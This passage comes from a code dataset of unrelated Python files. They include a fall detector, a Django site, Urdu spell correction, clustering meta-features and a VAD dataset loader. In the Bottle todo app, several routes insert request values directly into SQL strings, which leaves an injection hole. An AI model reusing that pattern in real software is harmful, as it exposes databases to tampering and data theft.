no longer 1e6, it proves that there is a human in picture\n human_keypoints=datum.poseKeypoints[human_id_in_keypoints]\n #print(human_keypoints)\n\n # HEAD monitor\n [head_monitor, full_or_not, insert_head_velocity, average_head_velocity]=fifo_append(head_monitor,human_keypoints)\n print(human_keypoints)\n # print(head_monitor)\n # print(full_or_not)\n # print(insert_head_velocity)\n # print(average_head_velocity)\n if full_or_not == True: # The HEAD monitor array is full now, its results are reliable\n #print(insert_head_velocity)\n #print(average_head_velocity)\n cv2.putText(newImage,\"insert v: %f\" % (insert_head_velocity),(600, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,0),2)\n cv2.putText(newImage,\"average v: %f\" % (average_head_velocity),(600, 680), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,0),2)\n\n # If the average head velocity is beyond the threshold, the fall detcion algorithm should start working\n if average_head_velocity>=ave_velocity_threshold:\n # BODY TILT detection\n center_line_angel, points_are_accurate=body_tilt_detection(human_keypoints)\n\n if points_are_accurate==True:\n cv2.putText(newImage,\"tilt_angle: %f\" % (center_line_angel),(600, 360), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,0),2)\n if center_line_angel<=math.pi/5: \n fall_happen=True\n append_copy[0]=picture_id\n fall_happen_picture_id=np.append(fall_happen_picture_id,append_copy)\n a_file=open(\"fall_id.txt\",\"w\")\n np.savetxt(a_file,fall_happen_picture_id)\n #pickle.dump(fall_happen_picture_id,a_file)\n a_file.close()\n\n\n\n\n\n\n\n #out_video.write(newImage)\n cv2.imshow(\"test\",newImage)\n out.write(newImage)\n cv2.waitKey(1)\n #out_video.write(newImage)\n\n\n print('Fall happen picture id: ',fall_happen_picture_id)\n cv2.destroyAllWindows()\n #out_video.release()\n cap.release()\n out.release()","repo_name":"zh237/IERG-6200-project-CV-based-fall-detector","sub_path":"video_analyze.py","file_name":"video_analyze.py","file_ext":"py","file_size_in_byte":11198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"19640088942","text":"import json\r\nimport requests\r\n\r\nurl_usable = \"https://api.coinmarketcap.com/v1/ticker/?start=0&limit=100\"\r\nresponse = requests.get(url_usable)\r\ntext = response.text\r\ndata = json.loads(text)\r\n\r\nprint(\"coins_tracked = [\")\r\nfor coin in data:\r\n print(\" '\" + coin['symbol'] + \"',\")\r\nprint(\"]\")\r\n\r\n","repo_name":"mkm1997/CryptoGrade-Complete","sub_path":"CoinViewer/utilfunctions/gen_coins_tracked.py","file_name":"gen_coins_tracked.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34565787967","text":"from typing import List\n# In this problem I used a dictionary to count all the elements frequency\n# then simply sorted in reverse order using the sort function and then displayed the returned the total number of top k frequent elements\ndef topK(nums:List[int], k:int) -> List[int]:\n rl = []\n e = list(set(nums))\n c = [0]*len(e)\n d = dict(zip(e,c))\n for i in nums:\n d[i] += 1\n d = dict(sorted(d.items(), key=lambda item: item[1], reverse=True))\n keys = list(d.keys())\n for i in range(k):\n rl.append(keys[i])\n return rl\n\nif __name__ == '__main__':\n nums = [1,1,1,2,2,3]\n k = 2\n print(topK(nums,k))\n","repo_name":"HarshaanNiles010/leetcode_soltuions","sub_path":"top_k_frequent.py","file_name":"top_k_frequent.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74675323306","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [url(r'^admin/service/$', views.my_admin_view),\n url(r'^$', views.events_list, name='events_list'),\n url(r'^adm/$', views.admin_list, name='adm'),\n url(r'^adm/jserv/$', views.jservice, name='jservice'),\n url(r'^jdata/$', views.jdata, name='jdata'),\n url(r'^tag/$', views.set_tags, name='tag_it'),\n url(r'^set_user_location/$', views.set_user_location, name='set_user_location'),\n url(r'^(?P[a-z]+)/$', views.events_list, name='location_events'),\n url(r'^add_event_selector/$', views.add_event_selector, name='add_event_selector'),\n url(r'^add_event_form/$', views.add_event_form, name='add_event_form'),\n url(r'^add_successfully/$', views.add_successfully, name='add_successfully'),\n url(r'^add_failed/$', views.add_failed, name='add_failed'),\n url(r'^(?P[a-z]+)/(?P[0-9]+)/(?P[\\w\\-.%]*)$', views.events_details,\n name='event_details'),\n ]\n","repo_name":"ASVorobiev/django_project","sub_path":"django_project/mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22736857351","text":"#!Python\n# -*- coding: utf-8 -*-\nimport sys\nimport json, sqlite3\n#from bottle import route, run, debug, template, request, send_file, error\nfrom bottle import * \n\n# only needed when you run Bottle on mod_wsgi\nfrom bottle import default_app\n\nclass dbman:\n\tconn = 0\n\tcur = 0\n\tdef __init__(self):\n\t\tself.conn = sqlite3.connect('todo.db')\n\t\tself.cur = self.conn.cursor()\n\n\tdef execute(self, m_sql):\n\t\tself.cur.execute(m_sql)\n\t\tself.conn.commit()\n\n\tdef fatchall(self, m_sql):\n\t\tself.cur.execute(m_sql)\n\t\tret = self.cur.fetchall()\n\t\treturn ret\n\n\tdef __del__(self):\n\t\tself.conn.close()\n\ndbop = dbman();\ndef to_index():\n\ttodo = dbop.fatchall(\"select id, task, time from xtodo where status = 1\")\n\tdone = dbop.fatchall(\"select id, task, time from xtodo where status = 0\")\n\tret = template('index', todolist = todo, donelist = done)\n\treturn ret\n\ndef get_all_task():\n\tret = []\n\ttodo = dbop.fatchall(\"select id, task, status, time from xtodo where status = 1\")\n\tdone = dbop.fatchall(\"select id, task, status, time from xtodo where status = 0\")\n\tret.append(todo)\n\tret.append(done)\n\treturn json.dumps(ret)\n\n@route('/')\ndef index():\n\treturn to_index()\n@route('/get_all_task')\ndef all_task():\n\treturn get_all_task()\n\n@route('/add', method = 'POST')\ndef add_new():\n\tif request.forms.get('txtadd').strip():\n\t\tnew = request.forms.get('txtadd').strip()\n\t\tdbop.execute(\"INSERT INTO xtodo (task,status) VALUES ('%s', %s)\"% (new, 1))\n\t\treturn get_all_task()\n\n@route('/done/:itemid', method = 'GET')\t\t\ndef done_this(itemid):\n\tif itemid.strip():\n\t\tdbop.execute(\"update xtodo set status = 0 where id = %s\" % itemid)\n\treturn get_all_task()\n\n@route('/redo/:itemid', method = 'GET')\ndef redo_this(itemid):\n\tif itemid.strip():\n\t\tdbop.execute(\"update xtodo set status = 1 where id = %s\" % itemid)\n\treturn get_all_task()\n\n@route('/del/:itemid', method = 'GET')\ndef redo_this(itemid):\n\tif itemid.strip():\n\t\tdbop.execute(\"delete from xtodo where id = %s\" % itemid)\n\treturn get_all_task()\n\n\n@route('/static/')\ndef server_static(filename):\n\t#print filename\n\treturn static_file(filename, root='static/')\n\n@route('/edit/:no', method='GET')\ndef edit_item(no):\n\n if request.GET.get('save','').strip():\n edit = request.GET.get('task','').strip()\n status = request.GET.get('status','').strip()\n\n if status == 'open':\n status = 1\n else:\n status = 0\n\n conn = sqlite3.connect('todo.db')\n c = conn.cursor()\n c.execute(\"UPDATE todo SET task = ?, status = ? WHERE id LIKE ?\", (edit,status,no))\n conn.commit()\n conn.close()\n\n return '

The item number %s was successfully updated

' %no\n\n else:\n conn = sqlite3.connect('todo.db')\n c = conn.cursor()\n c.execute(\"SELECT task FROM todo WHERE id LIKE ?\", no)\n cur_data = c.fetchone()\n conn.close()\n\n return template('edit_task', old = cur_data, no = no)\n\n@route('/item:item#[1-9]+#')\ndef show_item(item):\n\n conn = sqlite3.connect('todo.db')\n c = conn.cursor()\n c.execute(\"SELECT task FROM todo WHERE id LIKE ?\", item)\n result = c.fetchall()\n conn.close()\n\n if not result:\n return 'This item number does not exist!'\n else:\n return 'Task: %s' %result[0]\n\n@route('/help')\ndef help():\n\tpass\t\n#send_file('help.html', root='.')\n\n@route('/json:json#[1-9]+#')\ndef show_json(json):\n\n conn = sqlite3.connect('todo.db')\n c = conn.cursor()\n c.execute(\"SELECT task FROM todo WHERE id LIKE ?\", json)\n result = c.fetchall()\n conn.close()\n\n if not result:\n return {'task':'This item number does not exist!'}\n else:\n return {'Task': result[0]}\n\n\n@error(403)\ndef mistake403(code):\n return 'There is a mistake in your url!'\n\n@error(404)\ndef mistake404(code):\n return 'Sorry, this page does not exist!'\n\n\ndebug(True)\nrun(reloader=True)\n#remember to remove reloader=True and debug(True) when you move your application from development to a productive environment\n\n","repo_name":"helight/xtodo","sub_path":"xtodo.py","file_name":"xtodo.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32946461924","text":"# -*- coding: utf-8 -*-\nimport vtk\nimport os\n\nfolder = os.path.join(os.path.dirname(__file__), \"Marching Man\" )\n\ncolors = vtk.vtkNamedColors()\n\n#Dicom\n\nDICOMImageReader = vtk.vtkDICOMImageReader()\nDICOMImageReader.SetDirectoryName(folder)\n#DICOMImageReader.SetFileName(file)\nDICOMImageReader.Update()\n\nimageShift = vtk.vtkImageShiftScale()\nimageShift.SetInputConnection(DICOMImageReader.GetOutputPort())\nimageShift.SetOutputScalarTypeToUnsignedShort()\n\n\nmapper = vtk.vtkGPUVolumeRayCastMapper()\nmapper.SetInputConnection(imageShift.GetOutputPort())\n\n\nvolumeColor = vtk.vtkColorTransferFunction()\nvolumeColor.AddRGBPoint(100, 0.0, 0.0, 0.0)\nvolumeColor.AddRGBPoint(950, 1.0, 0.5, 0.3)\nvolumeColor.AddRGBPoint(1200, 1.0, 0.5, 0.3)\nvolumeColor.AddRGBPoint(1550, 1.0, 1.0, 0.9)\n\nscalarOpacity = vtk.vtkPiecewiseFunction()\nscalarOpacity.AddPoint(100, 0.00)\nscalarOpacity.AddPoint(950, 0.05)\nscalarOpacity.AddPoint(1200, 0.01)\nscalarOpacity.AddPoint(1550, 0.80)\n\nvolumeGradientOpacity = vtk.vtkPiecewiseFunction()\nvolumeGradientOpacity.AddPoint(0, 0.0)\nvolumeGradientOpacity.AddPoint(20, 0.5)\nvolumeGradientOpacity.AddPoint(30, 1.0)\n\n\nvolumeProperty = vtk.vtkVolumeProperty()\nvolumeProperty.SetColor(volumeColor)\nvolumeProperty.SetScalarOpacity(scalarOpacity)\nvolumeProperty.SetGradientOpacity(volumeGradientOpacity)\n\nvolume = vtk.vtkVolume()\nvolume.SetProperty(volumeProperty)\nvolume.SetMapper(mapper)\n\n#renderer\n\nren = vtk.vtkRenderer()\nrenWin = vtk.vtkRenderWindow()\nrenWin.AddRenderer(ren)\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\n\nren.AddVolume(volume)\nren.SetBackground(colors.GetColor3d(\"SlateGray\"))\nren.GetActiveCamera().SetFocalPoint(0, 0, 0)\nren.GetActiveCamera().SetPosition(0, -1, 0)\nren.GetActiveCamera().SetViewUp(0, 0, -1)\nren.ResetCamera()\nren.GetActiveCamera().Dolly(1.5)\nren.ResetCameraClippingRange()\n\nrenWin.SetSize(640, 480)\n\nrenWin.Render()\niren.Start()\n\n\n","repo_name":"NajTec/bm","sub_path":"Praktikas/uebung6_2.py","file_name":"uebung6_2.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27481110759","text":"# @Author: Joey Teng\n# @Email: joey.teng.dev@gmail.com\n# @Filename: meta_features.py\n# @Last modified by: Joey Teng\n# @Last modified time: 27-Mar-2018\n\"\"\"Define and calculate meta-features using given clusters.\n\nSee function meta-features()\n\"\"\"\n\nimport collections\nimport itertools\nimport math\n\nimport numpy\n\n\nINFINITESIMAL = 1e-323\n\n\ndef size_versus_number_of_clusters(clusters):\n \"\"\"Calculate the number of clusters respect to each size.\n\n Args:\n clusters (list): list of clusters\n\n Returns:\n dict:\n float: average\n float: standard deviation\n int: range\n dict: stats\n {size (int): quantity (int), ...}\n\n \"\"\"\n stats = collections.defaultdict(int) # default = 0\n sizes = [cluster['size'] for cluster in clusters]\n for cluster in clusters:\n # initial quantity is 0\n stats[cluster['size']] += 1\n\n average = numpy.average(sizes)\n standard_deviation = numpy.std(sizes)\n range_ = max(sizes) - min(sizes)\n\n return {\n 'average': average,\n 'standard deviation': standard_deviation,\n 'range': range_,\n 'stats': stats}\n\n\ndef volume_versus_size(clusters):\n \"\"\"Calculate volume of clusters respect to its size.\n\n Args:\n clusters (list): list of clusters\n\n Returns:\n dict: {size (int): volume (list of floats)}\n\n \"\"\"\n stats = collections.defaultdict(list)\n for cluster in clusters:\n # initial container is empty\n stats[cluster['size']].append(cluster['volume'])\n return stats\n\n\ndef log_volume_versus_size(clusters):\n \"\"\"Calculate log-volume of clusters respect to its size.\n\n Args:\n clusters (list): list of clusters\n\n Returns:\n dict: {size (int): log-volume (list of floats)}\n\n \"\"\"\n stats = collections.defaultdict(list)\n for cluster in clusters:\n # initial container is empty\n stats[cluster['size']].append(cluster['log-volume'])\n return stats\n\n\ndef calculate_inverse_density(cluster):\n \"\"\"Calculate the inverse of Density of a cluster.\n\n inverse of density = volume / size\n\n Args:\n clusters (list): list of clusters\n\n Returns:\n float: inverse of density\n\n \"\"\"\n inverse_density = cluster['volume'] / cluster['size']\n return inverse_density\n\n\ndef inverse_density_distribution(clusters, slots):\n \"\"\"Calculate number of clusters in each inverse of density interval.\n\n [lb - 1 * interval, ... (slots - 1) * interval - hb]\n lb = lower bound\n hb = higher bound\n interval = range / slots = (hb - lb) / slots\n\n Args:\n clusters (list): list of clusters\n slots (int): number of intervals\n\n Returns:\n dict:\n float: interval\n range / slots\n float: average\n numpy.average\n float: standard deviation\n numpy.std\n float: range\n higherbound - lowerbound\n dict: stats\n from lower bound to higher\n {inf: int, n-th slot: int, ...}\n [lb - 1 * interval, ... (slots - 1) * interval - hb]\n\n \"\"\"\n inverse_densities = list(map(calculate_inverse_density, clusters))\n\n stats = collections.defaultdict(int)\n interval = None\n lowerbound = INFINITESIMAL\n higherbound = INFINITESIMAL\n if inverse_densities:\n lowerbound = min(inverse_densities)\n higherbound = max(inverse_densities)\n _range = higherbound - lowerbound\n interval = _range / slots\n if math.isclose(interval, 0):\n interval = max(lowerbound, float(1)) # prevent ZeroDivisionError\n\n for inverse_density in inverse_densities:\n try:\n stats[int((inverse_density - lowerbound) / interval)] += 1\n except ZeroDivisionError:\n print(\"Densities: {}\".format(inverse_densities))\n print(\"Volumes: {}\".format(\n list(map(lambda x: x['volume'], clusters))))\n print(\"Size: {}\".format(\n list(map(lambda x: x['size'], clusters))))\n raise ZeroDivisionError(\n \"({} - {}) / {}\".format(\n inverse_density, lowerbound, interval))\n except ValueError as message:\n print(\"Densities: {}\".format(inverse_densities))\n print(\"Volumes: {}\".format(\n list(map(lambda x: x['volume'], clusters))))\n print(\"Size: {}\".format(\n list(map(lambda x: x['size'], clusters))))\n raise ValueError(\n \"({} - {}) / {}\\n{}\".format(\n inverse_density, lowerbound, interval, message))\n\n average = numpy.average(inverse_densities)\n standard_deviation = numpy.std(inverse_densities)\n range_ = higherbound - lowerbound\n\n return {'interval': interval,\n 'min': lowerbound,\n 'average': average,\n 'standard deviation': standard_deviation,\n 'range': range_,\n 'stats': stats}\n\n\ndef calculate_inverse_log_density(cluster):\n \"\"\"Calculate the log of inverse of Density of a cluster.\n\n inverse of density-log = log-volume - ln(size)\n\n Args:\n cluster ():\n\n Returns:\n float: inverse of density-log\n -inf if log-volume = -inf\n\n \"\"\"\n inverse_log_density = cluster['log-volume'] - math.log(cluster['size'])\n return inverse_log_density\n\n\ndef inverse_log_density_distribution(clusters, slots):\n \"\"\"Calculate number of clusters in each inverse of density interval.\n\n inverse_log_density = log-volume - ln(size)\n\n [lb - 1 * interval, ... (slots - 1) * interval - hb]\n lb = lower bound\n hb = higher bound\n interval = range / slots = (hb - lb) / slots\n\n Args:\n clusters (list): list of clusters\n slots (int): number of intervals\n\n Returns:\n dict:\n float: interval\n range / slots\n float: average\n numpy.average\n float: standard deviation\n numpy.std\n float: range\n higherbound - lowerbound\n dict: stats\n from lower bound to higher\n {inf: int, n-th slot: int, ...}\n [lb - 1 * interval, ... (slots - 1) * interval - hb]\n\n \"\"\"\n raw_inverse_log_densities = list(\n map(calculate_inverse_log_density, clusters))\n inverse_log_densities = [\n inverse_log_density\n for inverse_log_density in raw_inverse_log_densities\n if math.isfinite(inverse_log_density)]\n\n stats = collections.defaultdict(int)\n interval = None\n lowerbound = INFINITESIMAL\n higherbound = INFINITESIMAL\n if inverse_log_densities:\n lowerbound = min(inverse_log_densities)\n higherbound = max(inverse_log_densities)\n _range = higherbound - lowerbound\n interval = _range / slots\n if math.isclose(interval, 0):\n interval = max(lowerbound, float(1)) # prevent ZeroDivisionError\n\n for inverse_log_density in inverse_log_densities:\n try:\n stats[int((inverse_log_density - lowerbound) / interval)] += 1\n except ZeroDivisionError:\n print(\"Densities: {}\".format(inverse_log_densities))\n print(\"Volumes: {}\".format(\n list(map(lambda x: x['volume'], clusters))))\n print(\"Size: {}\".format(\n list(map(lambda x: x['size'], clusters))))\n raise ZeroDivisionError(\n \"({} - {}) / {}\".format(\n inverse_log_density, lowerbound, interval))\n except ValueError as message:\n print(\"Densities: {}\".format(inverse_log_densities))\n print(\"Volumes: {}\".format(\n list(map(lambda x: x['volume'], clusters))))\n print(\"Size: {}\".format(\n list(map(lambda x: x['size'], clusters))))\n raise ValueError(\n \"({} - {}) / {}\\n{}\".format(\n inverse_log_density, lowerbound, interval, message))\n\n # All spheres with -inf volume\n stats[-1] = len(raw_inverse_log_densities) - len(inverse_log_densities)\n\n average = numpy.average(inverse_log_densities)\n standard_deviation = numpy.std(inverse_log_densities)\n range_ = higherbound - lowerbound\n\n return {'interval': interval,\n 'min': lowerbound,\n 'average': average,\n 'standard deviation': standard_deviation,\n 'range': range_,\n 'stats': stats}\n\n\ndef label_versus_meta_features(clusters, func, *args, **kwargs):\n \"\"\"Calculate meta-features for clusters with each label.\n\n Separate clusters based on label and call the funcitons\n Include a '_population' label which indicate the meta-feature over\n the population regardless of the label\n\n Args:\n clusters (dict): list of clusters with ['label']\n func (function):\n the function that used to calculate the meta-feature required\n\n Returns:\n dict: stats\n {label (label): corresponding meta-feature, ...}\n\n \"\"\"\n _clusters = collections.defaultdict(list)\n _clusters['_population'] = list(itertools.chain(*clusters.values()))\n _clusters.update(clusters.items())\n stats = {}\n for label in _clusters:\n stats[label] = func(_clusters[label], *args, **kwargs)\n return stats\n\n\ndef meta_features(clusters): # TODO\n \"\"\"Calculate all the meta-features defined using clusters calculated.\n\n Args:\n clusters (list): list of clusters\n [{\n 'vertices' (list): vertices\n all the vertices on/defined the hull\n 'points' (list): vertices\n all the instances that are in the hull\n (same label as homogeniety is maintained)\n 'size' (int): the number of instances belong to this hull\n len(vertices) + len(points)\n 'volume' (float):\n the volume in the Euclidean n-dimensional space obtained\n by the hull\n 'label' (int):\n the category that the hull belongs to\n }, ...]\n\n Returns:\n meta-features (dict):\n {\n 'Number of Clusters' (int)\n 'Size versus Number of Clusters' ():\n 'Volume versus Size' ():\n 'Inverse Density distribution over 10 intervals' ():\n }\n\n \"\"\"\n return {'Number of Clusters':\n label_versus_meta_features(clusters, len),\n 'Size versus Number of Clusters':\n label_versus_meta_features(\n clusters, size_versus_number_of_clusters),\n # 'Volume versus Size':\n # label_versus_meta_features(clusters, volume_versus_size),\n 'log-Volume versus Size':\n label_versus_meta_features(clusters, log_volume_versus_size),\n # 'Inverse Density distribution over 10 intervals':\n # label_versus_meta_features(\n # clusters, inverse_density_distribution, 10)\n 'Inverse Log Density distribution over 10 intervals':\n label_versus_meta_features(\n clusters, inverse_log_density_distribution, 10)}\n","repo_name":"JoeyTeng/Algorithm-Selection-for-Classification-Problems-via-Cluster-based-Meta-features","sub_path":"meta_features.py","file_name":"meta_features.py","file_ext":"py","file_size_in_byte":11461,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"21527826098","text":"import re\nimport pandas as pd\n\nfile = open(\"jang.txt\", \"r+\", encoding='utf-8')\nList = file.read()\n\nWordList = []\ncount = 0\nWordName = []\nDict = {}\nword = \"\"\nfor i in List:\n if not (i == ' ' or i == '<' or i == 's' or i == '>' or i == ' ' or i == '/'):\n WordName.append(i)\n else:\n word = \"\"\n for a in WordName:\n word += a\n if word != \"\":\n if word in Dict:\n Dict[word] += 1\n count += 1\n else:\n Dict[word] = 1\n count += 1\n WordList.append(word)\n WordName = []\n # print(i)\n\nprint(Dict)\nprint(count)\n\nprint(WordList)\n\nUnigram={}\nfor w in WordList:\n Unigram[w] = Dict[w] / count\n print(Unigram[w])\n\n\nprint(Unigram)\nBigram = {}\nfor i in range(len(WordList) - 1):\n #print(WordList[i] + \" \" + WordList[i + 1])\n Bigram[WordList[i] + \" \" + WordList[i + 1]] = Unigram[WordList[i]] * Unigram[WordList[i + 1]]\n\nprint(Bigram)\n\n\ndef genedit1(word):\n letters = 'ابپتٹثجچحخدڈذرڑزژسشصضطظعغفقکگلمنوہیے'\n\n insertions = []\n deletions = []\n transpositons = []\n replacements = []\n\n # insert 1 character\n for i in range(len(word) + 1):\n for l in letters:\n insertions.append(word[:i] + l + word[i:])\n\n # delete 1 character\n for i in range(len(word) + 1):\n deletions.append(word[:i - 1] + word[i:])\n\n # replace 1 character\n for i in range(len(word) + 1):\n for l in letters:\n replacements.append(word[:i - 1] + l + word[i:])\n\n # replace 1 character\n\n for i in range(len(word) - 1):\n transpositons.append(word[:i] + (word[i + 1] + word[i]) + word[i + 2:])\n\n return set(insertions + deletions + replacements + transpositons)\n\n\ndef readfile(name):\n file = open(name, \"r+\", encoding='utf-8')\n List = file.read()\n\n WordList = []\n count = 0\n WordName = []\n word = \"\"\n for i in List:\n if not (i == ' ' or i == '<' or i == 's' or i == '>' or i == ' ' or i == '/'):\n WordName.append(i)\n else:\n word = \"\"\n for a in WordName:\n word += a\n if word != \"\":\n WordList.append(word)\n WordName = []\n\n return WordList\n\nerrorList=readfile(\"jang_errors.txt\")\n#print(errorList)\nnonErrorList=readfile(\"jang_nonerrors.txt\")\n#print(nonErrorList)\n\ndef readWordList(name):\n file = open(name, \"r+\", encoding='utf-8')\n List = file.read()\n\n WordList = []\n count = 0\n WordName = []\n word = \"\"\n for i in List:\n if i=='\\n':\n word = \"\"\n for a in WordName:\n\n word += a\n if word != \"\":\n WordList.append(word)\n WordName = []\n else:\n WordName.append(i)\n return WordList\n\nwordList=readWordList(\"wordlist.txt\")\n#print(wordList)\n\nwordList=set(wordList)\nprint(Dict)\n\n\ni=0\nprobabilityList=[]\nWordDict={}\nfor word in errorList:\n if word not in wordList:\n wordedit1= genedit1(word)\n candidateset= set()\n for edits in wordedit1:\n candidateset=candidateset.union(genedit1(edits))\n candidateset=candidateset.intersection(wordList)\n\n candwithscore=[]\n for candidate in candidateset:\n if candidate in Unigram:\n unigramscore= Unigram[candidate]\n bigram1=errorList[i-1] + \" \" + candidate\n bigram2=candidate + \" \" + errorList[i+1]\n probability=2*unigramscore\n if bigram1 in Bigram and bigram2 in Bigram:\n bigramscore= Bigram[bigram1] * Bigram[bigram2]\n probability=2*unigramscore+5*bigramscore\n candwithscore.append([probability,candidate])\n else:\n probability=0\n candwithscore.append([probability, candidate])\n df=pd.DataFrame(candwithscore,columns=['probability','candidate'])\n sort = df.sort_values(df.columns[0], ascending=False)\n sort=sort[:10]\n probabilityList.append([sort['candidate'].tolist(),sort['probability'].tolist()])\n sort=sort['candidate'].tolist()\n WordDict[word]=sort\n\n i+=1\n\nprint(WordDict)\nf = open(\"reportfile.txt\", \"a\", encoding='utf-8')\ncount=0\nfor i in range(len(errorList)-1):\n if errorList[i]!=nonErrorList[i]:\n f.write(\"Error=\" + errorList[i] + \" \")\n for k in probabilityList[count]:\n f.write(str(k))\n sortedList=WordDict[errorList[i]]\n for j in sortedList:\n if nonErrorList[i]==j:\n f.write(\" \" + errorList[i]+ \"Error corrected successfully\" + nonErrorList[i])\n f.write(\"\\n\")\n count+=1\n\n\n","repo_name":"haadfida/IRAssignments","sub_path":"Assignment3/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11696007999","text":"from django.shortcuts import redirect, render\nfrom django.views.generic import TemplateView, View\nfrom actors.models import SubZone, Category, Amendity\nfrom django.http import HttpResponse, HttpResponseNotFound\nimport json\n\nclass GetSubzoneScore(View):\n '''\n AJAX call to generate keys\n '''\n\n def get(self, request):\n scores = []\n data = request.GET\n subzone_name = str(data.get('subzone', None))\n try:\n subzone = SubZone.objects.get(name=subzone_name)\n except SubZone.DoesNotExist:\n print(\"SubZone does not exist\")\n return HttpResponseNotFound(content=dict(error_code=404, error_msg=\"Deployment does not exist\"));\n\n try:\n subzone_overall_score = subzone.overall_score\n categories = Category.objects.filter(subzone=subzone)\n\n except (ValueError, TypeError) as e:\n return HttpResponseNotFound(content=dict(error_code=402, error_msg=\"Subzone is invalid\"));\n\n scores = {}\n response_data = {}\n\n scores['overall'] = subzone_overall_score\n for category in categories:\n scores[category.get_category_type_display()] = category.score\n\n response_data = {'name': subzone_name,\n 'scores': scores\n }\n\n return HttpResponse(json.dumps(response_data), content_type=\"application/json\")\n\n\n\nclass MapView(TemplateView):\n\n template_name = 'pages/map.html'\n\n def get_town_info(self):\n towns = [] \n current_town_name = ''\n subzone_name = ''\n subzone_info = []\n\n subzones = SubZone.objects.all().order_by('town_name', 'name')\n\n print(subzones)\n\n for subzone in subzones:\n if not current_town_name:\n print(\"start town:%s\" % (subzone.get_town_name_display()))\n current_town_name = subzone.get_town_name_display()\n subzone_info.append({'name': subzone.name})\n elif current_town_name != subzone.get_town_name_display():\n print(\"old town %s new town: %s subzone %s\" % (current_town_name, subzone.get_town_name_display(), subzone_info))\n towns.append({'name': current_town_name, 'subzones': subzone_info})\n current_town_name = subzone.get_town_name_display()\n subzone_info = []\n subzone_info.append({'name': subzone.name})\n else:\n print(\"adding into same town\")\n subzone_info.append({'name': subzone.name})\n\n towns.append({'name': current_town_name, 'subzones': subzone_info})\n\n return {\n 'towns': towns\n }\n\n def get_context_data(self, **kwargs):\n ctx = super(MapView, self).get_context_data(**kwargs)\n\n towns = self.get_town_info()\n print(towns)\n ctx.update(towns)\n return ctx\n\n def dispatch(self, *args, **kwargs):\n return super(MapView, self).dispatch(*args, **kwargs)","repo_name":"anduslim/hacksg","sub_path":"on_admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72166792107","text":"import os, glob\nimport torch\nimport numpy as np\n\nclass VAD_dataset(torch.utils.data.Dataset):\n def __init__(self, hp,is_train=True) : \n super(VAD_dataset,self).__init__()\n self.hp = hp\n root = hp.data.root\n self.nframe = hp.train.nframe\n self.is_train = is_train\n\n if is_train : \n self.list_path = [x for x in glob.glob(os.path.join(root,'train','*.pt'))]\n else :\n self.list_path = [x for x in glob.glob(os.path.join(root,'test','*.pt'))]\n\n self.true_len = len(self.list_path)\n\n def __getitem__(self,index):\n path_item = self.list_path[index]\n\n # data[\"mel\"] :\n # - [n_mels, n_frame] = [32, 960]\n # - 10ms shift 75% overlap\n # data[\"label\"] :\n # - binary label\n data = torch.load(path_item)\n\n if self.nframe > data[\"mel\"].shape[1]:\n raise Exception(\"ERROR:: nframe is too large | \" +str(self.nframe) +\" > \" + str(data[\"mel\"].shape[1]))\n idx_start = np.random.randint(data[\"mel\"].shape[1]-self.nframe)\n idx_end = idx_start + self.nframe\n\n data[\"mel\"] = data[\"mel\"][:,idx_start:idx_end] \n data[\"mel\"] = torch.unsqueeze(data[\"mel\"],0)\n data[\"label\"] = data[\"label\"][idx_start:idx_end]\n \n if self.hp.model.specaug and self.is_train:\n freq_l = np.random.randint(low=self.hp.specaug.freq_min,high=self.hp.specaug.freq_max)\n freq_s = np.random.randint(low=0,high=self.hp.model.n_mels-freq_l)\n data[\"mel\"][0,freq_s:freq_s+freq_l,:] = 0\n\n shape = data[\"mel\"].shape\n\n if 'd' in self.hp.model.input :\n d = torch.zeros(shape)\n # C, dim, T\n d[:,:-1,:] = data[\"mel\"][0,1:,:]-data[\"mel\"][0,0:-1,:]\n # channel-wise concat\n data[\"mel\"] = torch.cat((data[\"mel\"],d),0)\n \n if 'dd' in self.hp.model.input :\n dd = torch.zeros(shape)\n dd[:,:-2,:] = data[\"mel\"][0,1:-1,:]-data[\"mel\"][0,0:-2,:]\n # channel-wise concat\n data[\"mel\"] = torch.cat((data[\"mel\"],dd),0)\n\n #mel = data[\"mel\"][:,idx_start:idx_end].float()\n #label = data[\"label\"][idx_start:idx_end]\n data[\"label\"] = torch.unsqueeze(data[\"label\"],0)\n\n #if self.hp.model.label == 1:\n # data[\"label\"] = torch.unsqueeze(data[\"label\"],0)\n #elif self.hp.model.label == 2:\n # tmp_label = torch.zeros(2,data[\"label\"].shape[0])\n # tmp_label[0,:] = data[\"label\"]\n # tmp_label[1,:] = (~data[\"label\"].bool()).float()\n # data[\"label\"] = tmp_label\n\n return data[\"mel\"].float(),data[\"label\"]\n #return mel,label\n\n def __len__(self):\n return len(self.list_path)","repo_name":"kooBH/VADK","sub_path":"src/VAD_dataset.py","file_name":"VAD_dataset.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71470832748","text":"from bs4 import BeautifulSoup\nimport requests, 